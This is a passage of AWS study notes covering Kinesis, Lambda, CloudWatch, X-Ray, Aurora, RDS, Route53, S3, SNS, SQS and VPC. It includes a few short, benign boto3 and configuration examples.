    • S3: retries for up to 24 hrs.
    • Redshift: retry duration from 0-7200 sec (2 hrs) from S3.
      • Skips S3 objects on failure.
      • Writes failed objects in manifest file, which can be used manually to recover lost data (manual backfill).
    • ElasticSearch: retry duration 0-7200 sec.
      • On failure, skips index request and stores in index_failed folder in S3.
      • Manual backfill.
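
A minimal sketch of such a Firehose transformation Lambda, following the recordId / result / data contract described above (the upper-casing is just a placeholder transformation):

    import base64

    def lambda_handler(event, context):
        """Return exactly one result entry per incoming Firehose record."""
        output = []
        for record in event["records"]:
            payload = base64.b64decode(record["data"]).decode("utf-8")
            transformed = payload.upper()                  # placeholder transformation
            output.append({
                "recordId": record["recordId"],            # must match the input recordId
                "result": "Ok",                            # or "Dropped" / "ProcessingFailed"
                "data": base64.b64encode(transformed.encode("utf-8")).decode("utf-8"),
            })
        return {"records": output}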

AWS Kinesis Overview:

  • Enables real-time processing of streaming data at massive scale.
  • Kinesis Streams:
    • Enables building custom applications that process or analyze streaming data for specialized needs.
    • Handles provisioning, deployment, and ongoing maintenance of hardware, software, and other services for the data streams.
    • Manages the infrastructure, storage, networking, and configuration needed to stream the data at the required data throughput level.
    • Synchronously replicates data across three facilities in an AWS Region, providing high availability and data durability.
    • Stores records of a stream for up to 24 hours, by default, from the time they are added to the stream. The limit can be raised to up to 7 days by enabling extended data retention.
    • Data such as clickstreams, application logs, social media, etc., can be added from multiple sources and within seconds is available for processing to the Amazon Kinesis Applications.
    • Provides ordering of records, as well as the ability to read and/or replay records in the same order to multiple Kinesis applications.
    • Useful for rapidly moving data off data producers and then continuously processing the data, whether it is to transform the data before emitting to a data store, run real-time metrics and analytics, or derive more complex data streams for further processing.

Use Cases:

  • Accelerated log and data feed intake: Data producers can push data to Kinesis stream as soon as it is produced, preventing any data loss and making it available for processing within seconds.
  • Real-time metrics and reporting: Metrics can be extracted and used to generate reports from data in real-time.
  • Real-time data analytics: Run real-time streaming data analytics.
  • Complex stream processing: Create Directed Acyclic Graphs (DAGs) of Kinesis Applications and data streams, with Kinesis applications adding to another Amazon Kinesis stream for further processing, enabling successive stages of stream processing.

Kinesis Limits:

  • Stores records of a stream for up to 24 hours, by default, which can be extended to max 7 days.
  • Maximum size of a data blob (the data payload before Base64-encoding) within one record is 1 megabyte (MB).
  • Each shard can support up to 1000 PUT records per second.
  • Each account can provision 10 shards per region, which can be increased further through request.
  • Amazon Kinesis is designed to process streaming big data and the pricing model allows heavy PUTs rate.
  • Amazon S3 is a cost-effective way to store your data but not designed to handle a stream of data in real-time.

Kinesis Streams Components:

Shard:

  • Streams are made of shards; a shard is the base throughput unit of a Kinesis stream.
  • Each shard provides a capacity of 1MB/sec data input and 2MB/sec data output.
  • Each shard can support up to 1000 PUT records per second.
  • All data is stored for 24 hours.
  • Replay data inside a 24-hour window.
  • Capacity Limits: If the limits are exceeded, either by data throughput or the number of PUT records, the put data call will be rejected with a ProvisionedThroughputExceeded exception.
    • This can be handled by:
      • Implementing a retry on the data producer side, if this is due to a temporary rise of the stream’s input data rate.
      • Dynamically scaling the number of shards (resharding) to provide enough capacity for the put data calls to consistently succeed.

Record:

  • A record is the unit of data stored in an Amazon Kinesis stream.
  • A record is composed of a sequence number, partition key, and data blob.
    • Data blob is the data of interest your data producer adds to a stream.
    • Maximum size of a data blob (the data payload before Base64-encoding) is 1 MB.

Partition Key:

  • Used to segregate and route records to different shards of a stream.
  • Specified by your data producer while adding data to an Amazon Kinesis stream.

Sequence Number:

  • A unique identifier for each record.
  • Assigned by Amazon Kinesis when a data producer calls PutRecord or PutRecords operation to add data to an Amazon Kinesis stream.
  • Sequence numbers for the same partition key generally increase over time; the longer the time period between PutRecord or PutRecords requests, the larger the sequence numbers become.

Data Producers:

  • Data can be added to an Amazon Kinesis stream via PutRecord and PutRecords operations, Kinesis Producer Library (KPL), or Kinesis Agent.

Amazon Kinesis Agent:

  • A pre-built Java application that offers an easy way to collect and send data to Amazon Kinesis stream.
  • Can be installed on Linux-based server environments such as web servers, log servers, and database servers.
  • Configured to monitor certain files on the disk and then continuously send new data to the Amazon Kinesis stream.

Amazon Kinesis Producer Library (KPL):

  • An easy to use and highly configurable library that helps you put data into an Amazon Kinesis stream.
  • Presents a simple, asynchronous, and reliable interface that enables you to quickly achieve high producer throughput with minimal client resources.

Amazon Kinesis Application:

  • A data consumer that reads and processes data from an Amazon Kinesis stream.
  • Can be built using either Amazon Kinesis API or Amazon Kinesis Client Library (KCL).

Amazon Kinesis Client Library (KCL):

  • A pre-built library with multiple language support.
  • Delivers all records for a given partition key to the same record processor.
  • Makes it easier to build multiple applications reading from the same Kinesis stream (e.g., to perform counting, aggregation, and filtering).
  • Handles complex issues such as adapting to changes in stream volume, load-balancing streaming data, coordinating distributed services, and processing data with fault-tolerance.

Amazon Kinesis Connector Library:

  • A pre-built library that helps you easily integrate Amazon Kinesis Streams with other AWS services and third-party tools.
  • Kinesis Client Library is required for Kinesis Connector Library.

Amazon Kinesis Storm Spout:

  • A pre-built library that helps you easily integrate Amazon Kinesis Streams with Apache Storm.

Kinesis vs SQS:

  • Kinesis Streams enables real-time processing of streaming big data while SQS offers a reliable, highly scalable hosted queue for storing messages and moving data between distributed application components.
  • Kinesis provides ordering of records, as well as the ability to read and/or replay records in the same order to multiple Amazon Kinesis Applications, while SQS does not guarantee data ordering and provides at least once delivery of messages.
  • Kinesis stores the data up to 24 hours, by default, and can be extended to 7 days, while SQS stores the message up to 4 days, by default, and can be configured from 1 minute to 14 days but clears the message once deleted by the consumer.
  • Kinesis and SQS both guarantee at-least-once delivery of messages.
  • Kinesis supports multiple consumers, while SQS allows the messages to be delivered to only one consumer at a time and requires multiple queues to deliver messages to multiple consumers.

Kinesis Use Case Requirements:

  • Ordering of records.
  • Ability to consume records in the same order a few hours later.
  • Ability for multiple applications to consume the same stream concurrently.
  • Routing related records to the same record processor (as in streaming MapReduce).

SQS Use Case Requirements:

  • Messaging semantics like message-level ack/fail and visibility timeout.
  • Leveraging SQS’s ability to scale transparently.
  • Dynamically increasing concurrency/throughput at read time.
  • Ability to delay individual messages.

Lambda

Introduction

  • Serverless, virtual functions
  • Short executions up to 15 minutes
  • Run on-demand
  • Pay for number of invocations and compute time
  • Works with many programming languages
    • Node.js, Python, Java, C#, Go, PowerShell, Ruby, and the Custom Runtime API (which can run practically any language)
  • You can provision up to 10GB of RAM per function

Lambda Integrations

  • API Gateway
  • Kinesis
  • DynamoDB
  • S3
  • CloudFront
  • CloudWatch Events / EventBridge
  • CloudWatch Logs
  • SNS
  • SQS
  • Cognito

Pricing

  • Pay per call:
    • First 1,000,000 requests are free
    • $0.20 per 1 million requests after the first million
  • Pay per duration
    • 400,000 GB-seconds of compute time per month for free

Synchronous Invocation

  • When invoking the function from the CLI, SDK, API Gateway, or ALB, the call is synchronous, meaning the result is returned right away
  • Error handling must happen on the client side (retries, exponential backoff, etc.)

Asynchronous Invocation

  • S3, SNS, CloudWatch Events are all processed asynchronously
  • The events are placed in an internal event queue
  • The lambda function will read from the event queue and attempt to process the events
  • Lambda will attempt to retry failures up to 3 times
    • This means that an event may be processed multiple times, so make sure the Lambda function is idempotent
    • If the function is retried, you will see duplicate entries in CloudWatch Logs
    • You can define a DLQ (dead-letter queue) (SNS or SQS) for failed processing
  • Async invocations allow you to speed up the processing if you don’t need to wait for the result
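
A minimal boto3 sketch contrasting the two invocation modes, assuming a deployed function named my-func (a placeholder name):

    import json
    import boto3

    lam = boto3.client("lambda")

    # Synchronous: the caller blocks and receives the function's result
    sync = lam.invoke(FunctionName="my-func",
                      InvocationType="RequestResponse",
                      Payload=json.dumps({"id": 1}).encode())
    print(json.load(sync["Payload"]))

    # Asynchronous: the event is queued and the call returns immediately (HTTP 202)
    lam.invoke(FunctionName="my-func",
               InvocationType="Event",
               Payload=json.dumps({"id": 2}).encode())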

S3 Event Notifications

  • Run a Lambda function when an event in S3 is detected

Lambda Event Source Mapping

  • Lambda will poll from the sources and be invoked synchronously
    • Kinesis Data Streams
    • SQS or SQS FIFO
    • DynamoDB Streams
  • Two categories of Event Source Mapping:
    • Streams
      • Kinesis or DynamoDB Streams
      • One Lambda invocation per stream shard
      • If you use parallelization, up to 10 batches processed per shard simultaneously
    • Queues
      • Poll SQS using Long Polling

Lambda in VPC

  • By default, Lambda functions are launched outside of your VPC. Therefore, they cannot access resources in your VPC.
  • Lambda can create an Elastic Network Interface inside your VPC
    • You must define the VPC ID, subnets, and security groups
    • Lambda requires the AWSLambdaVPCAccessExecutionRole
  • By default, a Lambda function in your VPC does not have internet access
    • Deploying a Lambda function in a public subnet does not give it internet access
    • Instead, you can deploy the Lambda function in a private subnet and give it internet access via a NAT Gateway / NAT Instance

Lambda Concurrency

  • Concurrency limit up to 1000 concurrent executions
  • Each invocation over the concurrency limit will receive an HTTP 429
  • Cold starts and provisioned concurrency
    • If the init is large, the cold start can take a long time. This may cause the first request to have higher latency than the rest
    • To resolve the cold start issue, you can use Provisioned concurrency
      • With Provisioned Concurrency, concurrency is allocated before the function is invoked

Lambda Containers

  • Deploy Lambda functions as container images up to 10GB from ECR

CloudTrail

Introduction

  • Records and monitors API calls made within your AWS account
  • Audit changes to AWS resources
  • Enabled by default
  • Event Types:
    • Management Events
    • Data Events
    • CloudTrail Insights Events
      • analyze events and try to detect unusual activity in your account
  • Event Retention
    • Events are stored by default for 90 days
    • To keep events beyond this period, log them to S3 and use Athena to analyze them

CloudWatch

Introduction

  • Metrics, Logs, Events, and Alarms

CloudWatch Metrics

  • CloudWatch provides metrics for every service in AWS
  • Metric is a variable to monitor (CPU Utilization, Network In, etc.)
  • Metrics belong to namespaces
  • Dimension is an attribute of a metric (instance id, environment, etc.)
  • Up to 30 dimensions per metric
  • Metrics have timestamp
  • You can create dashboards of metrics

EC2 Detailed Monitoring

  • By default, EC2 instance have metrics every 5 minutes
  • If you enable detailed monitoring, you can get metrics every 1 minute
  • Use detailed monitoring if you want your ASG to scale faster
  • The AWS Free tier allows us to have 10 detailed monitoring metrics
  • EC2 memory usage is not pushed by default (you must push it from inside the instance as a custom metric)

CloudWatch Custom Metrics

  • You can define your own custom metrics
  • Use an API call PutMetricData
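
A minimal boto3 sketch of publishing a custom metric (the namespace, dimension value, and metric value are placeholders):

    import boto3

    cloudwatch = boto3.client("cloudwatch")

    # Push a custom metric value, e.g. memory usage reported from inside an instance
    cloudwatch.put_metric_data(
        Namespace="MyApp",
        MetricData=[{
            "MetricName": "MemoryUsage",
            "Dimensions": [{"Name": "InstanceId", "Value": "i-0123456789abcdef0"}],
            "Value": 72.5,
            "Unit": "Percent",
        }],
    )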

CloudWatch Logs

  • Define log groups, usually representing an application
  • Log Stream: instances within the application / log files / containers
  • You can define log expiration policies
  • You can send CloudWatch logs to
    • S3
    • Kinesis Data Streams
    • Kinesis Data Firehose
    • AWS Lambda
    • OpenSearch
  • Logs are encrypted by default

Log Sources

  • SDK, CloudWatch Logs Agent, CloudWatch Unified Agent

  • BeanStalk: Collection of logs from the application

  • ECS: Collection from containers

  • AWS Lambda: collection from function logs

  • VPC Flow Logs

  • API Gateway

  • CloudTrail based on a filter

  • Route53

  • Use CloudWatch Logs Insights to query logs

CloudWatch Logs Subscriptions

  • Get real-time log events from CloudWatch Logs for processing and analysis
  • Send to Kinesis Data Streams, Kinesis Data Firehose, or Lambda
  • Subscription Filter - filters which log events are delivered to your destination

CloudWatch Alarms

  • Trigger notifications from any metric
  • Alarm States
    • Ok
    • Insufficient Data
    • Alarm
  • Targets
    • Actions on EC2 instances
    • Trigger autoscaling action
    • Send notification to SNS service
  • Composite Alarms monitor the state of multiple other alarms
    • AND and OR conditions

CloudWatch Synthetics Canary

  • Configurable script that can monitor your APIs, URLs, Websites, etc.
  • Reproduce what your customers do programmatically to find issues before customers are impacted
  • Blueprints
    • Heartbeat Monitor
    • API Canary
    • Broken Link Checker
    • Visual Monitoring
    • Canary Recorder
    • GUI Workflow Builder

Amazon EventBridge

  • React to events. Examples:

    • EC2 Instance started
    • Codebuild failed build
    • S3 upload object
    • schedule a cronjob
    • CloudTrail API call
  • Event Buses can be accessed across AWS accounts using Resource-Based Policies
    • Resource policies allow you to manage permissions for an EventBus

x-ray

Introduction

  • Troubleshooting application performance and errors
  • Distributed tracing of Micro-services
  • Compatible with
    • Lambda
    • Beanstalk
    • ECS
    • ELB
    • API Gateway
    • EC2 instances or any on-premises app server
  • You can enable x-ray by:
    • Install the x-ray daemon (on a server) or enable x-ray integration (some AWS services such as lambda)
    • You can instrument x-ray in your code using the AWS SDK
      • python, java, go, .NET, node.js

X-Ray APIs

  • Writes
    • PutTraceSegments - Uploads a segment document into X-Ray
    • PutTelemetryRecords - Used by the AWS X-Ray daemon to upload telemetry
    • GetSamplingRules - Retrieve all sampling rules
  • Reads
    • GetServiceGraph - main graph
    • BatchGetTraces - Retrieves a list of traces specified by ID
    • GetTraceSummaries - Retrieve Ids and annotations for traces available for a specified time frame using an optional filter
    • GetTraceGraph

X-Ray with Beanstalk

  • Beanstalk includes the x-ray daemon
  • You can run the daemon by setting an option in the Elastic Beanstalk console or with a configuration file (in .ebextensions/xray-daemon.config)
    option_settings:
      aws:elasticbeanstalk:xray:
        XRayEnabled: true
    
  • Make sure to give your instance profile the correct IAM permissions so that the x-ray daemon can function correctly
  • Your app code must still be instrumented with the X-Ray integration code

ECS + X-Ray

  • Patterns:
    • Run the X-Ray daemon container on every EC2 instance
    • Run the X-Ray container as a sidecar for the app containers (the only way to get ECS with Fargate working with X-Ray)

Aurora

Introduction

  • AWS proprietary database technology compatible with PostgreSQL and MySQL
  • 5x performance improvement over MySQL, 3x performance improvement over PostgreSQL
  • Storage automatically grows, starts at 10GB, grows up to 128 TB
  • Up to 15 read replicas, replication process is faster than MySql
  • Failover is instantaneous, HA is native to Aurora
  • About 25% more expensive than RDS

Aurora High Availability

  • 6 copies of your data across 3 AZ:
    • 4 copies out of 6 need to be available for writes
    • 3 copies out of 6 need to be available for reads
  • Self-healing with peer-to-peer replication
  • Storage is striped across 100s of volumes
  • Only one instance will take writes at a time, failover within 30 seconds
    • You can optionally enable “Local Write Forwarding” to forward writes from a read replica to the writer instance
  • Supports cross region replication
  • Reader endpoint is load balanced across all read replicas. Writer endpoint points to the current writer instance

Aurora Security

  • If the master is not encrypted, read replicas cannot be encrypted
  • To encrypt an unencrypted database, create a db snapshot and restore as encrypted

RDS (Relational Database Service)

Introduction

  • Fully managed relational database service
    • Automated provisioning and maintenance
    • Full backups and point in time restore
  • Monitoring dashboards
  • Multi AZ setup for DR
  • Read replicas for improved performance
  • Storage backed by EBS
  • Vertical and horizontal scaling
  • Supports
    • Postgres
    • MySql / MariaDB
    • Oracle
    • IBM DB2
    • MSSQL
    • Aurora (Postgres and MySQL)
  • You cannot SSH or access the underlying database compute instance
  • Storage auto-scaling

Read replicas

  • Scale out database reads
    • read replicas only support select statements
  • Improves performance for reads
  • You can create up to 15 read replicas in the same AZ, cross AZ, or cross region
  • Asynchronous replication, reads are eventually consistent
  • You can promote a read replica to a full read/write instance
  • Apps must update the connection string to use a read replica
  • Network costs
    • If the replica is in the same region, there is no fee for network traffic
    • Cross region replicas will cost you for replication traffic

RDS Proxy

  • Fully managed database proxy for RDS
  • Allow apps to pool and share DB connections established with the database
  • Improves database efficiency by reducing stress on the database resources by pooling connections at the proxy
  • Serverless, autoscaling, HA
  • Reduces RDS and Aurora failover time by up to 66%
  • RDS proxy is only accessible from within the VPC, it is never publicly accessible
  • RDS proxy is particularly helpful when you have auto-scaling lambda functions connecting to your database

Route53

Introduction

  • A highly available, fully managed, scalable, authoritative DNS service provided by Amazon
  • Also a domain registrar
  • Supports health checks for resources registered with DNS names
  • The only AWS service that provides 100% availability

Hosted Zones

  • Public Hosted Zones
    • Contain records that specify how to route traffic on the internet
  • Private Hosted Zones
    • Only hosts within the VPC can resolve the DNS names
  • You will pay 50 cents per month for each hosted zone
  • Domain names will cost you $12/year

TTL

  • Time to live
  • i.e. how long a DNS record will be cached on a client machine

CNAME vs Alias

  • Scenario: your load balancer is lb1-1234.us-east-2.elb.amazonaws.com and you want to expose it as myapp.mydomain.com
  • CNAME:
    • Points a hostname to any other hostname (app.domain.com => blabla.anything.com)
    • You cannot create a CNAME for the Apex record (root domain)
  • Alias:
    • Points a hostname to an AWS Resource (app.mydomain.com => blabla.amazonaws.com)
    • WORKS for ROOT DOMAIN and NON ROOT DOMAIN (aka, mydomain.com)
    • Free of charge
    • Native health check
    • Only supported for A and AAAA record types
    • Cannot set an alias for an EC2 instance DNS name

Routing Policies

  • Simple

    • Typically, the simple type of routing policy will resolve to a single resource
    • If the record resolves to multiple values, the client will choose a random one
    • When using the Alias record type, the record can only resolve to one resource
  • Weighted

    • Control the % of the requests that go to each specific resource.
    • Assign each record a relative weight
      • $\text{traffic}\ (\%) = \dfrac{\text{weight for a specific record}}{\text{sum of all the weights for all records}}$
      • The sum of the weights of all records does not need to equal 100
    • DNS records must have the same name and type
    • Can be associated with Health Checks
    • Use cases: load balancing between regions, testing new application versions
  • Latency

    • Redirects to the resource that has the lowest latency for the user
    • Super helpful when latency for users is a priority
    • Latency is based on traffic between users and AWS Regions
    • Germany users may be directed to the US (if that’s the lowest latency)
    • Can be associated with Health Checks (has a failover capability)
  • Failover

  • Geolocation

    • Different from latency based
    • This routing is based on user location
    • Should create a “Default” record (in case there’s no match on location)
    • Use cases: website localization, restrict content distribution, load balancing
    • Can be associated with Health Checks
  • Geoproximity

    • Route traffic to your resources based on the location of users and resources
    • Ability to shift more traffic to resources based on the defined bias
    • To change the size of the geographic region, specify bias values:
      • To expand (1 to 99) - more traffic to the resource
      • To shrink (-1 to -99) - less traffic to the resource
    • Resources can be:
      • AWS resources (specify AWS region)
      • Non-AWS resources (specify Latitude and Longitude)
    • You must use Route 53 Traffic Flow to use this feature
  • Health Checks

    • HTTP Health Checks are only for public resources. For a private resource, create a CloudWatch Metric and associate a CloudWatch Alarm with it, then create a Health Check that monitors the alarm
    • 15 global health checkers
    • Health checks methods:
      • Monitor an endpoint
        • Healthy/unhealthy threshold - 3 (default)
        • Interval 30 seconds
        • Supports HTTP, HTTPS, and TCP
        • if > 18% of health checkers report the endpoint is healthy, Route53 considers it healthy.
        • You can choose which locations you want Route53 to use
        • You must configure the firewall to allow traffic from the health checkers
      • Calculated Health Checks
        • Combine the results of multiple health checks into a single health check

Configuring Amazon Route 53 to route traffic to an S3 Bucket

  • An S3 bucket that is configured to host a static website
    • You can route traffic for a domain and its subdomains, such as example.com and www.example.com to a single bucket.
    • Choose the bucket that has the same name that you specified for Record name
    • The name of the bucket is the same as the name of the record that you are creating
    • The bucket is configured as a website endpoint

S3

Introduction

  • Storage
  • Files are stored in Buckets, the files are called objects
  • Buckets must have a globally unique, DNS-compliant name
  • Buckets are regional
  • Bucket names must have no uppercase, no underscore, 3-63 characters long, not an IP address, must start with a lowercase letter or number
  • Objects (files) have a key, which is the FULL path of the object:
    • Example of a prefix
      • bucket/folder1/subfolder1/mypic.jpg => prefix is /folder1/subfolder1/
  • S3 Select
    • Use SQL like language to only retrieve the data you need from S3 using server-side filtering
  • Max object size is 5TB
  • If you upload a file larger than 5GB, you must use Multi-part Upload
  • Objects can have metadata

S3 Security

  • User-Based

    • IAM Policies - Which API calls are allowed for an IAM user
  • Resource-Based

    • Bucket Policies - bucket-wide rules from the S3 console - allows cross-account access
    • Object ACL - Finer grained (can be disabled)
    • Bucket ACL - less common (can be disabled)
  • An IAM Principal can access an S3 object if:

    • The user's IAM permissions ALLOW it OR the resource policy ALLOWs it, AND there is no explicit DENY
  • Bucket Policies - Bucket wide rules from the S3 console

    • JSON based policy

        {
            "Version": "2012-10-17",
            "Statement": [{
                "Sid": "AllowGetObject",
                "Principal": {
                    "AWS": "*"
                },
                "Effect": "Allow",
                "Action": "s3:GetObject",
                "Resource": "arn:aws:s3:::DOC-EXAMPLE-BUCKET/*",
                "Condition": {
                    "StringEquals": {
                        "aws:PrincipalOrgID": ["o-aa111bb222"]
                    }
                }
            }]
        }
      
    • You can use the AWS Policy Generator to create JSON policies

S3 Static Website Hosting

  • You must enable public reads on the bucket

S3 Versioning

  • Allows you to keep multiple versions of an object

  • Stores all versions of an object in S3

  • Once enabled it cannot be disabled, only suspended on the bucket

  • Fully integrates with S3 Lifecycle rules

  • MFA Delete feature provides extra protection against deletion of your data

S3 Cross-Region Replication or Same-Region Replication

  • When enabled, any object that is uploaded is automatically replicated from the source bucket to the destination bucket (in another region for CRR, in the same region for SRR)

  • Must have versioning turned on both the source and destination buckets.

  • Can have CRR replicate to another AWS account

  • Replicate objects within the same region

  • You must give proper IAM permissions to S3

  • Buckets can be in different AWS accounts

  • Only new objects are replicated after enabling replication. To replicate existing objects, you must use S3 Batch Replication

  • For DELETE operations, you can optionally replicate delete markers. Delete Markers are not replicated by default.

  • To replicate, you create a replication rule in the “Management” tab of the S3 bucket. You can choose to replicate all objects in the bucket, or create a rule scope

S3 Storage Classes

  • AWS offers a range of S3 storage classes that trade retrieval time, accessibility, and durability for cheaper storage

(Descending from expensive to cheaper)

  • S3 Standard (default)

    • Fast! 99.99 % Availability,
    • 11 9’s Durability. If you store 10,000,000 objects on S3, you can expect to lose a single object once every 10,000 years
    • Replicated across at least three AZs
      • S3 standard can sustain 2 concurrent facility failures
  • S3 Intelligent Tiering

    • Monitors object access patterns and automatically determines the appropriate storage tier
    • Data is moved to most cost-effective tier without any performance impact or added overhead
  • S3 Standard-IA (Infrequent Access)

    • Still Fast! Cheaper if you access files less than once a month
    • An additional retrieval fee applies; the storage price is about 50% less than Standard (reduced availability)
    • 99.9% Availability
  • S3 One-Zone-IA

    • Still fast! Objects only exist in one AZ.
    • Availability is 99.5%, but about 20% cheaper than Standard-IA
    • Reduced durability: data could be destroyed if the AZ is lost
    • Retrieval fee is applied
  • S3 Glacier Instant Retrieval

    • Millisecond retrieval, great for data accessed once a quarter
    • Minimum storage duration of 90 days
  • S3 Glacier Flexible Retrieval

    • data retrieval: Expedited (1 to 5 minutes), Standard (3 to 5 hours), Bulk (5 to 12 hours) - free
    • minimum storage duration is 90 days
    • Retrieval of data can take minutes to hours, but the trade-off is very cheap storage
  • S3 Glacier Deep Archive

    • The lowest cost storage class - Data retrieval time is 12 hours
    • standard (12 hours), bulk (48 hours)
    • Minimum storage duration is 180 days
  • S3 Glacier Intelligent Tiering


  • Storage class comparison

  • S3 Guarantees:

    • Platform is built for 99.99% availability
    • Amazon's SLA guarantees 99.9% availability
    • Amazon guarantees 11 9's of durability

S3 LifeCycle Rules

  • Types of rules:
    • Transition Actions
      • Move objects between storage classes automatically
    • Expiration Actions
      • Configure objects to expire (delete) after some time
      • Can be used to delete incomplete multi-part uploads
      • Delete access logs automatically
      • Can be used to delete old versions of files if versioning is enabled
  • Rules can be specified for objects with a certain prefix or tag

Event Notifications

  • Examples of events:
    • S3:ObjectCreated, S3:ObjectRemoved, S3:ObjectRestore
  • Object name filtering is possible (*.jpg for example)
  • Send a notification when an event occurs
  • Uses SNS, Lambda, or SQS to send the notifications to
    • Requires a SNS Resource Policy, SQS Resource Policy, or a Lambda Resource Policy allowing S3 bucket to write to the resource
  • You can also send events to EventBridge, which can then be used to send the events to 18 other AWS services

S3 Encryption

  • 4 types of encryption in S3
    • Server side encryption with managed keys (SSE-S3)
      • Key is completely managed by AWS, you never see it
      • Object is encrypted server-side
      • Enabled by default
        • Uses AES-256, must set header "x-amz-server-side-encryption": "AES256"
    • Server side encryption with KMS keys stored in AWS KMS (SSE-KMS)
      • Manage the key yourself, store the key in KMS
      • You can audit the key use in CloudTrail
        • Uses AES-256; must set header "x-amz-server-side-encryption": "aws:kms"
      • Accessing the key counts toward your KMS Requests quota (5500, 10000, 30000 rps, based on region)
        • You can request a quota increase from AWS
    • Server Side Encryption with customer provided keys (SSE-C)
      • Can only be enabled/disabled from the AWS CLI
      • AWS doesn’t store the encryption key you provide
      • The key must be passed as part of the headers with every request you make
      • HTTPS must be used
    • CSE (Client side encryption)
      • Clients encrypt/decrypt all the data before sending any data to S3
      • Customer fully managed the keys and encryption lifecycle
  • Encryption in Transit
    • Traffic between local host and S3 is achieved via SSL/TLS
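
A minimal boto3 sketch of uploading an object with SSE-KMS (bucket name, key, and KMS alias are placeholders); boto3 sets the x-amz-server-side-encryption header for you:

    import boto3

    s3 = boto3.client("s3")

    s3.put_object(
        Bucket="my-bucket",
        Key="data/report.csv",
        Body=b"col1,col2\n1,2\n",
        ServerSideEncryption="aws:kms",      # SSE-KMS; omit for the SSE-S3 default
        SSEKMSKeyId="alias/my-app-key",      # placeholder KMS key alias
    )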

MFA Delete

  • MFA Delete ensures users cannot delete objects from a bucket unless they provide their MFA code.
  • MFA delete can only be enabled under these conditions
    1. The AWS CLI must be used to turn on MFA delete
    2. The bucket must have versioning enabled
  • Only the bucket owner, logged in as the root user, can permanently delete object versions from the bucket

Presigned URLs

  • Generates a URL which provides temporary access to an object to either upload or download object data.

  • The presigned URL inherits the permissions of the user that created it

  • Presigned Urls are commonly used to provide access to private objects

  • Can use AWS CLI or AWS SDK to generate Presigned Urls

  • Example: a web application needs to let users download files from a password-protected part of the app. The web app generates a presigned URL that expires after a short time (e.g., 5 seconds), and the user downloads the file with it.
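
A minimal boto3 sketch of generating such a download URL (bucket and key are placeholders):

    import boto3

    s3 = boto3.client("s3")

    # URL that allows a GET on the private object for the next 5 minutes
    url = s3.generate_presigned_url(
        "get_object",
        Params={"Bucket": "my-bucket", "Key": "reports/2024.pdf"},
        ExpiresIn=300,
    )
    print(url)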

Simple Notification System

Introduction

  • Pub/sub system
  • The “event producer” only sends messages to one SNS topic
  • As many subscribers as we want to listen to the SNS topic notifications
  • Each subscriber to the topic will get all of the messages (new feature to filter messages)
  • Up to 12,500,000 subscriptions per topic
  • 100,000 topic limit
  • Subscribers can be:
    • SQS, Lambda, Kinesis Data Firehose, Emails, SMS, etc.
  • Publishers can be:
    • CloudWatch, Budgets, S3 Event Notifications, and many more…

How to publish

  • Topic Publish (using the SDK)
    • Create a topic
    • Create a subscription (or many)
    • Publish to the topic
  • Direct Publish (for mobile apps SDK)
    • Create a platform application
    • Create a platform endpoint
    • Publish to the platform endpoint
    • Works with Google GCM, Apple APNS, Amazon ADM, etc.
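
A minimal boto3 sketch of the topic-publish flow (topic name and email address are placeholders):

    import boto3

    sns = boto3.client("sns")

    # Create a topic, add a subscriber, then publish to the topic
    topic_arn = sns.create_topic(Name="order-events")["TopicArn"]
    sns.subscribe(TopicArn=topic_arn, Protocol="email", Endpoint="ops@example.com")
    sns.publish(TopicArn=topic_arn, Subject="Order placed", Message='{"order_id": 123}')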

SNS + SQS: Fan Out

  • Concept: Push once in SNS, receive in all SQS queues that are subscribers

Simple Queue System

Introduction

  • When you deploy an application, it will communicate in one of two ways
    • Synchronous: Applications talk directly to each other
    • Asynchronous: Applications use some type of ‘middle-man’ to communicate, such as a queue
  • A queue can have multiple producers and multiple consumers
  • SQS offers unlimited throughput and unlimited messages, with less than 10 ms latency
  • SQS is the oldest service provided by AWS
  • The default TTL of a message in the queue is 4 days and the maximum is 14 days
  • Messages must be less than 256 KB
  • SQS can have duplicate messages and messages may be delivered out of order

Producing Messages

  • Messages are sent to SQS using the SendMessage API
  • The message is persisted until a consumer deletes it, unless the TTL expires

Consuming Messages

  • An application you write. Can be hosted anywhere (AWS, on-prem, etc.)
  • The consumer will poll the queue for new messages and receive up to 10 messages at a time
  • Consumers need to delete messages after processing them, otherwise other consumers may receive the messages
  • You can create an EC2 ASG that polls the CloudWatch queue-length metric and scales in/out based on its value
    • This metric value is the number of messages in a queue
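
A minimal boto3 consumer sketch (the queue URL and the process handler are placeholders): receive up to 10 messages with long polling, process each one, then delete it so it is not redelivered.

    import boto3

    sqs = boto3.client("sqs")
    queue_url = "https://sqs.us-east-1.amazonaws.com/123456789012/my-queue"  # placeholder

    resp = sqs.receive_message(QueueUrl=queue_url, MaxNumberOfMessages=10, WaitTimeSeconds=20)
    for msg in resp.get("Messages", []):
        process(msg["Body"])                                   # hypothetical handler
        sqs.delete_message(QueueUrl=queue_url, ReceiptHandle=msg["ReceiptHandle"])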

SQS Queue Access Policy

  • You can allow an EC2 instance in a different AWS account to access a queue using an SQS access policy
  • You can use an access policy to allow an S3 bucket to write to an SQS queue using Event Notifications

Message Visibility Timeout

  • After a message is polled by a consumer, it becomes invisible to other consumers
  • By default, the message is invisible to other consumers for 30 seconds
  • If a message is not processed within the visibility timeout, it becomes visible again and may be processed twice. A consumer can call the ChangeMessageVisibility API to extend the timeout while it is still processing
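
Continuing the consumer sketch above, a handler that needs more time before deleting a message can extend its visibility timeout:

    # Give this consumer another 120 seconds before the message becomes visible again
    sqs.change_message_visibility(QueueUrl=queue_url,
                                  ReceiptHandle=msg["ReceiptHandle"],
                                  VisibilityTimeout=120)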

Dead letter Queues

  • If a consumer fails to process a message within the Visibility Timeout, the message goes back to the queue.
  • We can set a threshold of how many times the message can go back into the queue
  • After the MaximumReceives threshold is exceeded, the message goes into a dead letter queue (DLQ)
  • The Dead letter queue of a FIFO queue must also be a FIFO queue
  • The dead letter queue of a standard queue must also be a standard queue

FIFO Queues

  • First in, first out
  • Messages are ordered in the queue, first message to arrive is the first message to leave
  • The name of the queue must end in ‘.fifo’
  • De-duplication
    • default de-duplication interval is 5 minutes
    • Two de-duplication methods:
      • Content based de-duplication: will hash the message body and compare
      • Explicitly provide a Message De-duplication Id
  • Message Grouping

VPC

Introduction

  • VPC is a private network within AWS
  • VPC’s can contain one or more subnets
  • A public subnet is a subnet that is accessible from the internet
  • To define access to the internet and between subnets, use route tables

Internet Gateway and NAT Gateway

  • Internet gateways help the VPC connect to the internet
  • Public subnets have a route to the internet gateway
  • NAT gateways and NAT instances (self-managed) allow your instances in your private subnet to access the internet while remaining private

Network ACL and Security Groups

